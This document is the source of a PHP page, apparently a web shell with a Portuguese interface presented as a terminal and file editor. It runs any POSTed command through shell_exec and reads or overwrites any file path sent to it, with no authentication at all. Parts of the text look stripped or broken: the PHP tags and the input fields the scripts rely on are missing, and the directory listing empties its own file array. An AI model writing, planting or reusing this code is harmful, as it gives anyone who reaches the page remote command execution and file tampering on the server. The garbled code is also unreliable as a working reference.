session_start();if (!isset($_SESSION['comandos_executados'])) { $_SESSION['comandos_executados'] = [];}if (!isset($_SESSION['current_dir'])) { $_SESSION['current_dir'] = getcwd();}if (isset($_POST['abrir_arquivo'])) { $arquivo = $_POST['abrir_arquivo']; if (file_exists($arquivo)) { $conteudo = file_get_contents($arquivo); echo json_encode(['conteudo' => $conteudo]); } else { echo json_encode(['erro' => 'Arquivo não encontrado']); } exit;}if (isset($_POST['salvar_arquivo'])) { $arquivo = $_POST['arquivo']; $conteudo = $_POST['conteudo']; if (file_put_contents($arquivo, $conteudo)) { echo json_encode(['sucesso' => 'Arquivo salvo com sucesso!']); } else { echo json_encode(['erro' => 'Erro ao salvar o arquivo']); } exit;}if (isset($_POST['listar_arquivos'])) { $diretorio = isset($_POST['diretorio']) ? $_POST['diretorio'] : $_SESSION['current_dir']; $arquivos = array_diff(scandir($diretorio), array('.', '..')); $pastas = []; $arquivos = []; foreach ($arquivos as $item) { if (is_dir($diretorio . '/' . $item)) { $pastas[] = $item; } else { $arquivos[] = $item; } } echo json_encode(['pastas' => $pastas, 'arquivos' => $arquivos]); exit;}if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['comando'])) { $comando = $_POST['comando']; $current_dir = $_SESSION['current_dir']; chdir($current_dir); $saida = ""; if (preg_match('/^\s*cd\s+(.+)/', $comando, $matches)) { $dir = $matches[1]; if ($dir == '..') { chdir('..'); } else { if (chdir($dir)) { $_SESSION['current_dir'] = getcwd(); } else { $saida = "Erro: não foi possível mudar para o diretório $dir"; exit; } } } else { $saida = shell_exec($comando . ' 2>&1'); } $_SESSION['comandos_executados'][] = ['comando' => $comando, 'saida' => $saida]; $_SESSION['current_dir'] = getcwd(); echo "DIRETORIO_ATUAL: " . $_SESSION['current_dir'] . "\n"; echo "> " . $comando . "\n"; echo $saida . "\n"; exit;}<!DOCTYPE html><html lang="pt-br"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0">Terminal e Editor PHP <title>Terminal e Editor PHP</title> <style> body { font-family: monospace; background-color: #000; color: white; margin: 0; padding: 0; display: flex; } .sidebar { width: 200px; background-color: #333; padding: 10px; height: 100vh; color: white; } .sidebar button { background: #444; color: white; padding: 10px; width: 100%; border: none; text-align: left; cursor: pointer; margin: 5px 0; } .sidebar button:hover { background: #555; } .main-content { flex-grow: 1; padding: 20px; } .editor, .terminal { background-color: #000; padding: 20px; border-radius: 5px; height: 400px; color: white; overflow-y: auto; } input, textarea { width: 100%; padding: 10px; margin-top: 10px; border: 1px solid #ccc; font-size: 16px; color: #333; background: #444; } #caminho-arquivo { color: red; } textarea { height: 300px; font-family: monospace; color: white; } .current-directory { font-weight: bold; margin-bottom: 10px; } .terminal-output { color: white; } h3 { color: red; } .pasta { color: lightblue; cursor: pointer; } .arquivo-selecionado { color: green; } </style><div class="sidebar"> <button onclick="showTerminal()">Executar Comando</button> <button onclick="showEditor()">Editar Arquivos</button></div><div class="main-content"> <div id="terminal" class="terminal">

Terminal

<div id="current-directory"></div> <button onclick="executarComando()">Executar</button> <pre id="output" class="terminal-output"></pre> </div> <div id="editor" class="editor" style="display: none;">

Editor de Arquivos

<div> <button onclick="listarArquivosNaPasta()">Ir para Pasta</button> </div> <div> <button onclick="abrirArquivo()">Abrir Arquivo</button> </div> <div id="navegacao-pastas"></div> <textarea id="conteudo-arquivo" style="display: none;"></textarea> <button id="salvar" style="display: none;" onclick="salvarArquivo()">Salvar</button> <pre id="erro-arquivo" style="color: red;"></pre> </div></div><script> function updateCurrentDirectory(directory) { document.getElementById('current-directory').innerText = 'Diretório Atual: ' + directory; } function showTerminal() { document.getElementById('terminal').style.display = 'block'; document.getElementById('editor').style.display = 'none'; } function showEditor() { document.getElementById('editor').style.display = 'block'; document.getElementById('terminal').style.display = 'none'; listarArquivosNaPasta(); } function listarArquivosNaPasta() { var caminhoPasta = document.getElementById('caminho-pasta').value.trim(); if (caminhoPasta !== "") { var xhr = new XMLHttpRequest(); xhr.open('POST', '', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onload = function() { var response = JSON.parse(xhr.responseText); var navegacao = document.getElementById('navegacao-pastas'); navegacao.innerHTML = ''; response.pastas.forEach(function(pasta) { var item = document.createElement('div'); item.classList.add('pasta'); item.textContent = pasta; item.onclick = function() { document.getElementById('caminho-pasta').value += '/' + pasta; listarArquivosNaPasta(); }; navegacao.appendChild(item); }); response.arquivos.forEach(function(arquivo) { var item = document.createElement('div'); item.classList.add('arquivo'); item.textContent = arquivo; item.onclick = function() { document.getElementById('nome-arquivo').value = arquivo; abrirArquivo(); }; navegacao.appendChild(item); }); }; xhr.send('listar_arquivos=true&diretorio=' + encodeURIComponent(caminhoPasta)); } } function abrirArquivo() { var caminhoPasta = document.getElementById('caminho-pasta').value.trim(); var nomeArquivo = document.getElementById('nome-arquivo').value.trim(); if (caminhoPasta !== "" && nomeArquivo !== "") { var caminhoCompleto = caminhoPasta + '/' + nomeArquivo; var xhr = new XMLHttpRequest(); xhr.open('POST', '', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onload = function() { var response = JSON.parse(xhr.responseText); if (response.conteudo) { document.getElementById('conteudo-arquivo').style.display = 'block'; document.getElementById('conteudo-arquivo').value = response.conteudo; document.getElementById('salvar').style.display = 'block'; document.getElementById('erro-arquivo').innerText = ''; } else { document.getElementById('erro-arquivo').innerText = response.erro; } }; xhr.send('abrir_arquivo=' + encodeURIComponent(caminhoCompleto)); } } function salvarArquivo() { var caminhoPasta = document.getElementById('caminho-pasta').value.trim(); var nomeArquivo = document.getElementById('nome-arquivo').value.trim(); var conteudo = document.getElementById('conteudo-arquivo').value.trim(); if (caminhoPasta !== "" && nomeArquivo !== "") { var caminhoCompleto = caminhoPasta + '/' + nomeArquivo; var xhr = new XMLHttpRequest(); xhr.open('POST', '', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onload = function() { var response = JSON.parse(xhr.responseText); if (response.sucesso) { alert(response.sucesso); } else { alert(response.erro); } }; xhr.send('salvar_arquivo=true&arquivo=' + encodeURIComponent(caminhoCompleto) + '&conteudo=' + encodeURIComponent(conteudo)); } } function executarComando() { var comando = document.getElementById('comando').value; if (comando.trim() === "") { return; } var xhr = new XMLHttpRequest(); xhr.open('POST', '', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onload = function() { var response = xhr.responseText; document.getElementById('output').innerText += response + '\n'; var match = response.match(/DIRETORIO_ATUAL:(.*?)(\n|$)/); if (match) { updateCurrentDirectory(match[1].trim()); } }; xhr.send('comando=' + encodeURIComponent(comando)); } updateCurrentDirectory(' echo $_SESSION['current_dir']; ');</script>